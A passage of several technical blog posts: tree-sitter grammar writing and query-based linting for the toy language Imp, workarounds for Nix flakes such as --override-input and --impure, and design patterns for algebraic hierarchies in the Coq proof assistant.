z := x;
y := 1;
y := y;
while ~(z = 0) do
y := y * z;
z := z - 1;
x := x;
end;
x := x;
if x = y then x := 1 else x := 1 end
There’s some redundancies for sure! We can tell the user about
assignments such as x := x
which are a no-op, and that last if
statement certainly looks redundant since both branches are the same
statement.
It’s simple to create a Query object in JavaScript and run it over the root node.
const redundantQuery = new Query(
Imp,
"((asgn name: (id) @left _ @right) (#eq? @left @right)) @redundantAsgn"
);
console.log(redundantQuery.captures(tree.rootNode));
This is what we get:
[
{
name: 'redundantAsgn',
node: AsgnNode {
type: asgn,
startPosition: {row: 2, column: 0},
endPosition: {row: 2, column: 6},
childCount: 3,
}
},
{
name: 'left',
node: IdNode {
type: id,
startPosition: {row: 2, column: 0},
endPosition: {row: 2, column: 1},
childCount: 0,
}
},
// etc...
]
Ok, that’s a lot of detail! Notice that every capture name was reported along with what type of node matched and the start and end of the match. Some tools might want this information, but for us it’s enough to report only the start of the match and the text that the match corresponded to:
// Given a raw list of captures, extract the row, column and text.
function formatCaptures(tree, captures) {
return captures.map((c) => {
const node = c.node;
delete c.node;
c.text = tree.getText(node);
c.row = node.startPosition.row;
c.column = node.startPosition.column;
return c;
});
}
Now we get something more concise:
[
{ name: 'redundantAsgn', text: 'y := y', row: 2, column: 0 },
{ name: 'left', text: 'y', row: 2, column: 0 },
{ name: 'right', text: 'y', row: 2, column: 5 },
{ name: 'redundantAsgn', text: 'x := x', row: 6, column: 2 },
{ name: 'left', text: 'x', row: 6, column: 2 },
{ name: 'right', text: 'x', row: 6, column: 7 },
{ name: 'redundantAsgn', text: 'x := x', row: 8, column: 0 },
{ name: 'left', text: 'x', row: 8, column: 0 },
{ name: 'right', text: 'x', row: 8, column: 5 }
]
And of course, it’s trivial to filter out the captures corresponding to a given name:
// Get the captures corresponding to a capture name
function capturesByName(tree, query, name) {
return formatCaptures(
tree,
query.captures(tree.rootNode).filter((x) => x.name == name)
).map((x) => {
delete x.name;
return x;
});
}
Passing tree
, redundantQuery
and "redundantAsgn"
to
capturesByName
, we get:
[
{ text: 'y := y', row: 2, column: 0 },
{ text: 'x := x', row: 6, column: 2 },
{ text: 'x := x', row: 8, column: 0 }
]
Now you can process these objects however you like. Note that tree-sitter uses zero-based indexing for the rows and columns, and you might want to offset it by one so users can locate it in their text editor. Here’s a simple approach:
// Lint the tree with a given message, query and match name
function lint(tree, msg, query, name) {
console.log(msg);
console.log(capturesByName(tree, query, name));
}
lint(tree, "Redundant assignments:", redundantQuery, "redundantAsgn");
We get the output:
Redundant assignments:
[
{ text: 'y := y', row: 2, column: 0 },
{ text: 'x := x', row: 6, column: 2 },
{ text: 'x := x', row: 8, column: 0 }
]
As a bonus, we can reuse our existing code for new queries! Here’s a couple:
((if condition: _ @c consequent: _ @l alternative: _ @r)
(#eq? @l @r)) @redundantIf
((plus (num) @n) (#eq? @n 0)) @addzero
Here are some exercises to try:
skip
statementTo appreciate it more, think about what we would have done had we not used tree-sitter. The process might have gone something like this:
Note that there are several steps were things could go wrong or block
us later. If we wrote the parser, say in Haskell using
megaparsec, we would
have not been able to recover the rows and columns of the syntax
elements (or painfully write an abstract data type with annotations).
And even worse, what happens when the user supplies syntactically
invalid input? Some parser generators based on GLR parsing such as
Bison
allow for error recovery, but then we’d need to define a custom
error
token and come up with ad-hoc logic for dealing with it.
Tree-sitter separates these design choices into orthogonal ones. A tree-sitter grammar is easy to write and reusable in any language with a C FFI. The error recovery logic is pervasive yet unwritten, and the resulting AST is annotated with locations and can be easily pattern-matched over with queries.
Should we throw tree-sitter at every problem involving parsing? No! There are certainly some areas where we need syntax trees without error nodes, and sometimes the incremental parsing is not necessary. For instance, if we’re working with a build farm, we don’t want to build package definitions with syntax errors!
Beyond linting, tree-sitter has also found applications in GitHub’s search-based code navigation which also makes use of the query language to annotate the AST with tags.
]]>Every passing decade, it seems as if the task of implementing a new programming language becomes easier. Parser generators take the pain out of parsing, and can give us informative error messages. Expressive type systems in the host language let us pattern-match over a recursive syntax tree with ease, letting us know if we’ve forgotten a case. Property-based testing and fuzzers let us test edge cases faster and more completely than ever. Compiling to intermediate languages such as LLVM give us reasonable performance to even the simplest languages.
Say you have just created a new language leveraging the latest and greatest technologies in programming language land, what should you turn your sights to next, if you want people to actually adopt and use it? I’d argue that it should be writing a tree-sitter grammar. Before I elaborate what tree-sitter is, here’s what you’ll be able to achieve much more easily:
And the best part is that you can do it in an afternoon! In this post we’ll write a grammar for Imp, a simple imperative language, and you can get the source code here.
This post was inspired by my research in improving the developer experience for FORMULA and Spin.
Tree-sitter is a parser generator tool. Unlike other parser generators, it especially excels at incremental parsing, creating useful parse trees even when the input has syntax errors. And best of all, it’s extremely fast and dependency-free, letting you parse the entirety of the file on every keystroke in milliseconds. The generated parser is written in C, and there are many bindings to other programming languages, so you can programmatically walk the tree as well.
Imp is a simple imperative language often used as an illustrative example in programming language theory. It has arithmetic expressions, boolean expressions and different kinds of statements including sequencing, conditionals and while loops.
Here’s an Imp program that computes the factorial of x
and places the
result in y
.
// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
y := y * z;
z := z - 1;
end
Check out the official tree-sitter development guide.
If you’re using Nix, run nix shell nixpkgs#tree-sitter
nixpkgs#nodejs-16-x
to enter a shell with the necessary dependencies.
Note that you don’t need to have it set up to continue reading this post, since I’ll provide the terminal output at appropriate points.
First we follow the grammar for expressions given in the chapter. Here it is for reference.
a := nat
| id
| a + a
| a - a
| a * a
| (a)
b := true
| false
| a = a
| a <= a
| ~b
| b && b
a
corresponds to arithmetic expressions and b
corresponds to
boolean expressions.
The easiest things to handle are numbers and variables. We can add the following rules:
id: $ => /[a-z]+/,
nat: $ => /[0-9]+/,
The grammar for arithmetic expressions can easily be translated:
program: $ => $.aexp,
aexp: $ => choice(
/[0-9]+/,
/[a-z]+/,
seq($.aexp,'+',$.aexp),
seq($.aexp,'-',$.aexp),
seq($.aexp,'*',$.aexp),
seq('(',$.aexp,')'),
),
Let’s try to compile it! Here’s what tree-sitter outputs:
Unresolved conflict for symbol sequence:
aexp '+' aexp • '+' …
Possible interpretations:
1: (aexp aexp '+' aexp) • '+' …
2: aexp '+' (aexp aexp • '+' aexp)
Possible resolutions:
1: Specify a left or right associativity in `aexp`
2: Add a conflict for these rules: `aexp`
Tree-sitter immediately tells that our rules are ambiguous, that is, the same sequence of tokens can have different parse trees. We don’t want to be ambiguous when writing code! Let’s make everything left-associative:
program: $ => $.aexp,
aexp: $ => choice(
/[0-9]+/,
/[a-z]+/,
prec.left(1,seq($.aexp,'+',$.aexp)),
prec.left(1,seq($.aexp,'-',$.aexp)),
prec.left(1,seq($.aexp,'*',$.aexp)),
seq('(',$.aexp,')'),
),
However, something’s not quite right when we parse 1*2-3*4
:
It’s being parsed as ((1*2)-3)*4
, which is clearly a different
interpretation! We can fix this by specfiying prec.left(2,...)
for
*
. The resulting parse tree we get is what we want.
Note that in many real language specs, the precedence of binary operators is given, so it becomes pretty routine to figure out the associativity and precedence to specify.
The grammars for boolean expressions and statements are similar, and can be found in the accompanying repository.
Phew, so now we have a grammar that tree-sitter compiles. How do we
actually run it? The tree-sitter CLI has two subcommands to help out
with this, tree-sitter parse
and tree-sitter test
. The parse
subcommand takes a path to a file and parses it with the current
grammar, printing the parse tree to stdout. The test
subcommand
runs a suite of tests defined in a very simple syntax:
===
skip statement
===
skip
---
(program
(stmt
(skip)))
The rows of equal signs denote the name of the test, followed by the program to parse, then a line of dashes followed by the expected parse tree.
When we run tree-sitter test
, we get a check if a test passed and a
cross if it failed, complete with a diff showing the expected
vs. actual parse tree (to illustrate the error I replaced the example
code with skip; skip
instead):
tests:
✗ skip
✓ assignment
✓ prec
✓ prog
1 failure:
expected / actual
1. skip:
(program
(stmt
(seq
(stmt
(skip))
(stmt
(skip)))))
(skip)))
Believe it or not, that was pretty much all there is to writing a tree-sitter grammar! We can immediately put it to use by using it to perform syntax highlighting. Traditional syntax highlighting methods used in editors rely on regex and ad-hoc heuristics to colorize tokens, whereas since tree-sitter has access to the entire parse tree it can not only color identifiers, numbers and keywords, but also can do so in a context-aware fashion—for instance, highlighting local variables and user-defined types consistently.
The tree-sitter highlight
command lets you generate syntax
highlighting
of your source code and render it in your terminal or output to HTML.
Tree-sitter’s syntax
highlighting
is based on queries. Importantly, we need to assign highlight names
to different nodes in the tree. We only need the following 5 lines
for this simple language. The square brackets indicate alternations,
that is, if any of the nodes in the tree match an item in the list,
then assign the given capture name (prefixed with @
) to it.
[ "while" "end" "if" "then" "else" "do" ] @keyword
[ "*" "+" "-" "=" ":=" "~" ] @operator
(comment) @comment
(num) @number
(id) @variable.builtin
And here is what tree-sitter highlight --html
on the factorial
program gives
// Compute factorial
z := x;
y := 1;
while ~(z = 0) do
y := y * z;
z := z - 1;
end
Not bad! Operators, keywords, numbers and identifiers are clearly highlighted, and the comment being grayed out and italicized makes the code more readable.
Creating a tree-sitter grammar is only the beginning. Now that you have a fast, reliable way to generate syntax trees even in the presence of syntax errors, you can use this as a base to build other tools on. I’ll briefly describe some of the topics below but they really deserve their own blog post at a later date.
Syntax highlighting can become more informative semantically with tree-sitter. That is, we can have the syntax highlighter color local variable names one color, global variables another, distinguish between field access and method access, and more. Doing such nuanced highlighting using a regex-based highlighter is about as futile as trying to parse HTML with regex.
Tree-sitter grammars compile to a dynamic library which can be loaded into editors such as Emacs, Atom and VS Code on any platform (including WebAssembly). Using the extension mechanisms in each editor, you can build packages on top which can use the syntax tree for a variety of things, such as structural code navigation, querying the syntax tree for specific nodes (see screenshot), and of course syntax highlighting. Here’s an incomplete list of projects that use tree-sitter to enhance editing:
Tree-sitter has bindings in several languages. You can use this information and tree-sitter’s query language to traverse the syntax tree looking for specific patterns (or anti-patterns) in your programming language. To see this in action for Imp, see my minimal example of linting Imp with the JavaScript bindings. More details in a future post!
Parsing technology has come a long way since the birth of computer science almost a century ago (see this excellent timeline of parsing). We’ve gone from being unable to handle recursive expressions and precedence to LALR parser generators and now GLR and fast incremental parsing with tree-sitter. It stands to reason that the tools millions of developers use every day to look at their code should take advantage of such developments. We can do better than line-oriented editing or hacky regexps to transform and highlight our code. The future is structural, and perhaps tree-sitter will play a big role in it!
]]>Nevertheless, this hermeticity comes with some downsides, especially when it comes to bandwidth, disk space and CPU usage. The reason for this is that Nixpkgs occasionally merges PRs that “rebuild the world,” for instance, staging next cycles, or urgent updates to OpenSSL and other critical packages (which cause a rebuild in say, Vim because it affects the git derivation used to fetch it.) Thus when you want to use a package that depends on an older or newer commit of Nixpkgs and some mass-rebuild PR landed in the intervening time, you’ll be faced with mass downloads of almost every dependency that probably did not change in terms of build contents, but whose build environments differed enough that Nix considers them different.
After over a year of using flakes in practice, I’ve noticed certain ways in which I overcome these inconveniences, which I’ll elaborate below.
Note that this isn’t to say the hacks are without drawbacks. I’ll make it apparent in each hack what the benefits and drawbacks are.
Scenario: want to avoid a mass rebuild when trying to build an older project
Fix: override the nixpkgs
input with a fixed reference
Drawbacks: might lose reproducibility, but it’s fine if the changes weren’t major between the pinned commit and overriden one
Around a year ago, I started pinning my Nixpkgs
registry.
This lets me keep my flake reference to nixpkgs
consistent across my
systems (as opposed to using channels.) This is good when running
commands with nix run
so that instead of using the most up-to-date
commit of Nixpkgs, it uses the pinned one from my system instead.
I then deploy my server configuration using a simple tool. So when I want to update my server I run the following command
$ nix run github:winterqt/deploy -- siraben-land
[0/81 built, 1/0/14 copied (3.7/924.4 MiB), 1.0/161.4 MiB DL] fetching llvm-13.0.0-lib from https://cache.nixos.org
Huh? What does LLVM have to do with using the deployment tool? Why
are there 81 rebuilds? Such scenarios are commonplace in my
experience, due to the gap between what the package set Nixpkgs to and
where Nixpkgs is currently. The solution is thus to override the
flake input altogether. Many flake commands accept the
--override-input
flag that takes two arguments; a path to override
and the new flake reference to override it with. In the following
command I’m overriding the input called nixpkgs
with nixpkgs
from
my registry.
$ nix run github:winterqt/deploy --override-input nixpkgs nixpkgs --siraben-land
warning: not writing modified lock file of flake 'github:winterqt/deploy':
• Updated input 'nixpkgs':
'github:NixOS/nixpkgs/5c37ad87222cfc1ec36d6cd1364514a9efc2f7f2' (2021-12-25)
→ 'github:NixOS/nixpkgs/a529f0c125a78343b145a8eb2b915b0295e4f459' (2022-01-31)
Notice that the reference to Nixpkgs went forward in time by a month. In this case, I avoided rebuilds and the server config deployed without any problems. Of course, the natural downside to this is that you might lose reproducibility if there were major changes between the two commits. In most non-critical cases, the resources and time saved are worth the risk.
Scenario: when working with a pre-flakes project, we want to be able to build a derivation specified with a given expression
Fix: pass the --impure
flag
Drawbacks: could lead to larger closure sizes
In the world of Nix flakes, impure references to things as such as the
current directory are outright banned. For instance, suppose we’re on
aarch64-darwin
and we want to build GNU Hello for x86_64-darwin
,
before flakes we might run
$ nix-build -E 'with (import ./. {system="x86_64-darwin";}); hello'
So the Nix command equivalent would be
$ nix build --expr 'with (import ./. {system="x86_64-darwin";}); hello'
error: access to absolute path '/Users/siraben/Git/forks/nixpkgs' is forbidden in pure eval mode (use '--impure' to override)
(use '--show-trace' to show detailed location information)
As the error message suggests, we have to pass --impure
to it,
resulting in
$ nix build --impure --expr 'with (import ./. {system="x86_64-darwin";}); hello'
which succeeds as usual. Note that this might lead to increased closure sizes because a path reference results in the entire directory of the package being copied to the Nix store.
Scenario: want to build unfree packages or packages that are marked as broken for the current platform
Fix: pass --impure
to nix build
Drawbacks: mostly harmless™
As an example, the math-comp book has a
flake.nix
file defined. So we might be tempted to try to build the
book with flakes:
$ nix build github:math-comp/mcb
error: Package ‘math-comp-book’ in /nix/store/z5d23mcmv3va30nfkg1q40iz62xyi57a-source/flake.nix:36 has an unfree license (‘cc-by-nc-40’), refusing to evaluate.
a) To temporarily allow unfree packages, you can use an environment variable
for a single invocation of the nix tools.
$ export NIXPKGS_ALLOW_UNFREE=1
b) For `nixos-rebuild` you can set
{ nixpkgs.config.allowUnfree = true; }
in configuration.nix to override this.
Alternatively you can configure a predicate to allow specific packages:
{ nixpkgs.config.allowUnfreePredicate = pkg: builtins.elem (lib.getName pkg) [
"math-comp-book"
];
}
c) For `nix-env`, `nix-build`, `nix-shell` or any other Nix command you can add
{ allowUnfree = true; }
to ~/.config/nixpkgs/config.nix.
(use '--show-trace' to show detailed location information)
Unfortunately in this case it’s not clear what the fix is. Even if
you set that environment variable, you still get the same error
message. Again harkening back to the philosophy of Nix flakes,
querying environment variables is considered impure. The fix is to
again pass the --impure
flag while setting the environment variable
at the same time.
$ NIXPKGS_ALLOW_UNFREE=1 nix build --impure github:math-comp/mcb && tree ./result
./result
└── share
└── book.pdf
There really isn’t any downside to this method, as far as I know. Unless environment variables you set in your shell also affect other aspects of the build, everything should be the same, and you’ll be able to run and build packages that were marked as broken or unfree previously.
Nix flakes isn’t to blame for these workarounds arising per se. In a sense, Nix becomes too pure to the extent where resources are being used when they don’t strictly need to, especially for non-critical use cases. In the future, features such as a content-addressed store may help with issues such as mass rebuilds, where package hashes are determined by their build contents and not their input derivations.
]]>From left to right, the structures can be roughly classified as pertaining to order theory, algebra and topology. For the object-oriented programmer: how many instances of multiple inheritance do you see?
It’s important to capture the way structures are organized in mathematics in a proof assistant with some uniform strategy, well-known in the OOP world as “design patterns.” In this article I will catalogue and explain a selection of various patterns and their strengths and benefits. They are (in order of demonstration):
For convenience as a reference I will start with the most recommended elegant and boilerplate-free patterns to the ugliest and broken ones.
The running example will be a simple algebraic hierarchy: semigroup,
monoid, commutative monoid, group, Abelian group. That should be
elaborate enough to show how the approaches hold up in a more
realistic setting. Here’s an overview of the hierarchy we’ll be
building over a type A
:
add : A -> A -> A
(a binary operation over A
)addrA : forall x y z, add x (add y z) = add (add x y) z
zero : A
add0r : forall x, add zero x = x
addr0 : forall x, add x zero = x
addrC : addrC : forall (x y : A), add x y = add y x;
opp : A -> A
(inverse function)addNr : forall x, add (opp x) x = zero
(addition of an element
with its inverse results in identity)You may also see ssreflect style statements such as associative add
.
Then, if all goes well, we will test the expressiveness of our hierarchy by proving a simple lemma, which makes use of a law from every structure.
(* Let A an instance of AbGroup, then the lemma holds *)
Lemma example A (a b : A) : add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
Reading: Type Classes for Mathematics in Type Theory
A well-known and vanilla approach is to use typeclasses. This goes
very well, our declaration for AbGroup
is just the constraints,
similar to how it would be done in Haskell. However, pay special
attention to the definition of AbGroup
, there’s a !
in front of
the ComMonoid
constraint to expose the implicit arguments again, so
that it can implicitly inherit the monoid instance from G
.
Require Import ssrfun ssreflect.
Class Semigroup (A : Type) (add : A -> A -> A) := { addrA : associative add }.
Class Monoid A `{M : Semigroup A} (zero : A) := {
add0r : forall x, zero + x = x;
addr0 : forall x, x + zero = x
}.
Class ComMonoid A `{M : Monoid A} := { addrC : commutative add }.
Class Group A `{M : Monoid A} (opp : A -> A) := {
addNr : forall x, add (opp x) x = zero
}.
Class AbGroup A `{G : Group A} `{CM : !ComMonoid A}.
The example lemma is easily proved, showing the power of typeclass resolution in unifying all the structures.
Lemma example A `{M : AbGroup A} (a b : A)
: add (add (opp b) (add b a)) (opp a) = zero.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
See the accompanying gist for the instantation of the structures over ℤ.
The Hierarchy Builder (HB) package is best described as a boilerplate generator, but in a good way! From a usability point of view, it is similar to typeclasses.
First we define semigroups. HB.mixin Record IsSemigroup A
declares
that we are about to define a predicate IsSemigroup
over a type A
,
and the two entries in the record denote the binary operation and its
associativity, respectively. We also define an infix notation for
convenience.
From HB Require Import structures.
From Coq Require Import ssreflect.
(* Semigroup definition *)
HB.mixin Record IsSemigroup A := {
add : A -> A -> A;
addrA : forall x y z, add x (add y z) = add (add x y) z;
}.
HB.structure Definition Semigroup := { A of IsSemigroup A }.
(* Left associative by default *)
Infix "+" := add.
Next we define monoids. Similarly to semigroups we use the mixin
command, but now declare the inheritance by of IsSemigroup A
. That
is, for a type to be a monoid, it must be a semigroup first.
(* Monoid definition, inheriting from Semigroup *)
HB.mixin Record IsMonoid A of IsSemigroup A := {
zero : A;
add0r : forall x, add zero x = x;
addr0 : forall x, add x zero = x;
}.
HB.structure Definition Monoid := { A of IsMonoid A }.
Notation "0" := zero.
Now that we’ve seen two examples, there’s no surprises left on how to define commutative monoids and groups.
(* Commutative monoid definition, inheriting from Monoid *)
HB.mixin Record IsComMonoid A of Monoid A := {
addrC : forall (x y : A), x + y = y + x;
}.
HB.structure Definition ComMonoid := { A of IsComMonoid A }.
(* Group definition, inheriting from Monoid *)
HB.mixin Record IsGroup A of Monoid A := {
opp : A -> A;
addNr : forall x, opp x + x = 0;
}.
HB.structure Definition Group := { A of IsGroup A }.
Notation "- x" := (opp x).
Now for the interesting part. Hierarchy Builder makes it easy for us to do multiple inheritance and combine the constraints, much like typeclasses. Then we can seemlessly prove the lemma exactly as we did before.
(* Abelian group definition, inheriting from Group and ComMonoid *)
HB.structure Definition AbGroup := { A of IsGroup A & IsComMonoid A }.
(* Lemma that holds for Abelian groups *)
Lemma example (G : AbGroup.type) (a b : G) : -b + (b + a) + -a = 0.
Proof. by rewrite addrC (addrA (opp b)) addNr add0r addNr. Qed.
The underlying code it generates follows a pattern known as packed
classes (elaborated in the next section). For future-proofing, the
generated code can be shown by prefixing a HB command with
#[log]
. When the HB.structure
command is invoked, a bunch of
mixins and definitions are created. For brevity I’m omitted some of
them here.
...
Top_AbGroup__to__Top_Semigroup is defined
Top_AbGroup__to__Top_Monoid is defined
Top_AbGroup__to__Top_Group is defined
Top_AbGroup__to__Top_ComMonoid is defined
join_Top_AbGroup_between_Top_ComMonoid_and_Top_Group is defined
...
In more detail, here is the output of Print
Top_AbGroup__to__Top_ComMonoid.
, which shows that it is a coercion
that lets us go from an Abelian group structure to a commutative
monoid structure (i.e. going back up the hierarchy.) Hierarchy
Builder automatically creates these coercions and joins for us.
Top_AbGroup__to__Top_ComMonoid =
fun s : AbGroup.type =>
{| ComMonoid.sort := s; ComMonoid.class := AbGroup.class s |}
: AbGroup.type -> ComMonoid.type
Top_AbGroup__to__Top_ComMonoid is a coercion
It is worth noting that the math-comp library is undergoing a transition to use Hierarchy Builder in the future, instead of hand-written instances and coercions.
Reading: Canonical structures for the working Coq user
In the math-comp library, the approach taken is known as the packed classes design pattern. It’s a fairly complicated construct that I might elaborate more in a future blog post, but I’ll give some highlights and a full example.
Note that math-comp is being ported to Hierarchy builder, so this style is being phased out.
According to the Mathematical Components book,
Telescopes suffice for most simple — tree-like and shallow — hierarchies, so new users do not necessarily need expertise with the more sophisticated packed class organization covered in the next section
Here’s how to define a monoid. We create a module, postulate a type
T
and an identity element zero
of type T
, and combine the laws
into a record called law
. The exports section is small here but we
export just the operator
coercion.
Module Monoid.
Section Definitions.
Variables (T : Type) (zero : T).
Structure law := Law {
operator : T -> T -> T;
_ : associative operator;
_ : left_id zero operator;
_ : right_id zero operator
}.
Local Coercion operator : law >-> Funclass.
End Definitions.
Module Import Exports.
Coercion operator : law >-> Funclass.
End Exports.
End Monoid.
Export Monoid.Exports.
With that defined, we can instantiate the monoid structure for
booleans (note that zero
is automatically unified with true
).
Import Monoid.
Lemma andbA : associative andb. Proof. by case. Qed.
Lemma andTb : left_id true andb. Proof. by case. Qed.
Lemma andbT : right_id true andb. Proof. by case. Qed.
Canonical andb_monoid := Law andbA andTb andbT.
Let’s define a semigroup using one of the most basic features of Coq, records. Writing it this way means it is simply just a conjunction of laws as an n-ary predicate over n components. We define the semigroup structure first, then consider monoids as an augmented semigroup.
Require Import ssrfun.
Record Semigroup {A : Type} : Type := makeSemigroup {
s_add : A -> A -> A;
s_addrA : associative s_add;
}.
Record Monoid {A : Type} : Type := makeMonoid {
m_semi : @Semigroup A;
m_zero : A;
m_add0r : forall x, (s_add m_semi) m_zero x = x;
m_addr0 : forall x, (s_add m_semi) x m_zero = x;
}.
Unfortunately we already have to make an awkward choice to do some sort of indexing to access the underlying shared associative binary operation. At the next level when one defines groups as an augmented monoid, the situation only gets worse:
Record Group {A : Type} : Type := makeGroup {
m_monoid : @Monoid A;
g_inv : A -> A;
g_addNr : forall x, (s_add (m_semi m_monoid)) (g_inv x) x = m_zero m_monoid;
}.
We have to access the operation through two different indexes for
it! Perhaps we might want to add a member to the record that is equal
to the inherited operation, but this too is not satisfactory since it
prevents us from creating a canonical name for the operation in
question (for instance, add
), and we’d have to do this at
arbitrarily nested levels. Thus, while flexible, this approach does
not scale.
One approach, seen in CPDT is to use the module system to organize the hierarchy. It seems fine for the first few structures. We declare parameterized modules and postulate additional axioms upon the structure from which it is inheriting from.
Require Import ssrfun.
Module Type SEMIGROUP.
Parameter A: Type.
Parameter Inline add: A -> A -> A.
Axiom addrA : associative add.
End SEMIGROUP.
Module Type MONOID.
Include SEMIGROUP.
Parameter zero : A.
Axiom add0r : left_id zero add.
End MONOID.
Module Type COM_MONOID.
Include MONOID.
Axiom addrC : commutative add.
End COM_MONOID.
Module Type GROUP.
Include MONOID.
Parameter opp : A -> A.
Axiom addNr : forall x, add (opp x) x = zero.
End GROUP.
However, we immediately run into an issue when trying to create a
Abelian group from a commutative monoid and group, this is because the
carrier type A
is already in scope from the first include, so we
cannot share the carrier type (or even the underlying monoid) with
GROUP
. So we give up.
Module Type COM_GROUP.
Include COM_MONOID.
Fail Include GROUP.
End COM_GROUP.
The command has indeed failed with message:
The label A is already declared.
Just like software engineering, there are many ways to organize mathematical theories in proof assistants such as Coq.
Personally, I would lean more towards organizing my theories with Hierarchy Builder—or at the very least, typeclasses, if external dependencies are an issue.
]]>